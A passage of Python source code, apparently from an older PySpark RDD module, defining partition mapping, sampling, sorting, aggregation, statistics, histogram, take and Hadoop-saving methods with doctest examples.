def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return ifilter(f, iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda (x, _): x)
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
>>> rdd = sc.parallelize(range(100), 4)
>>> rdd.sample(False, 0.1, 81).count()
10
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(5), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> rdd1.collect()
[1, 3]
>>> rdd2.collect()
[0, 2, 4]
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxint - int(numStDev * sqrt(sys.maxint))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxint)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
Note that this method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda (k, vs): all(vs)) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, 2)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
spill = (self.ctx._conf.get("spark.shuffle.spill", 'True').lower() == "true")
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted if spill else sorted
return iter(sort(iterator, key=lambda (k, v): keyfunc(k), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
# noqa
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
spill = (self.ctx._conf.get("spark.shuffle.spill", 'True').lower() == 'true')
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted if spill else sorted
return iter(sort(iterator, key=lambda (k, v): keyfunc(k), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda (k, v): k).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts but one of the them has
# an implicit boundary
bounds = [samples[len(samples) * (i + 1) / numPartitions]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions)
def pipe(self, command, env={}):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
['1', '2', '', '3']
"""
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
out.write(str(obj).rstrip('\n') + '\n')
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
return (x.rstrip('\n') for x in iter(pipe.stdout.readline, ''))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print x
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print x
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(port, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero
value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(obj, acc)
yield acc
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
an U and one operation for merging two U
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
return self.mapPartitions(func).fold(zeroValue, combOp)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = numPartitions
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).reduce(operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
and 50 we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
this can be switched from an O(log n) inseration to O(1) per
element(where n = # buckets).
Buckets must be sorted and not contain any duplicates, must be
at least two elements.
If `buckets` is a number, it will generates buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given buckets
as 2, the resulting buckets will be [0,50) [50,100]. buckets must
be at least 1 If the RDD contains infinity, NaN throws an exception
If the elements in RDD do not vary (max == min) always returns
a single bucket.
It will return an tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, (int, long)):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.iteritems():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from a RDD.
Note: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from a RDD ordered in ascending order or as
specified by the optional key function.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and use the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self._jrdd.partitions().size()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first paramter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p, True)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all. Note that an RDD
may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self._jrdd.partitions().size() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
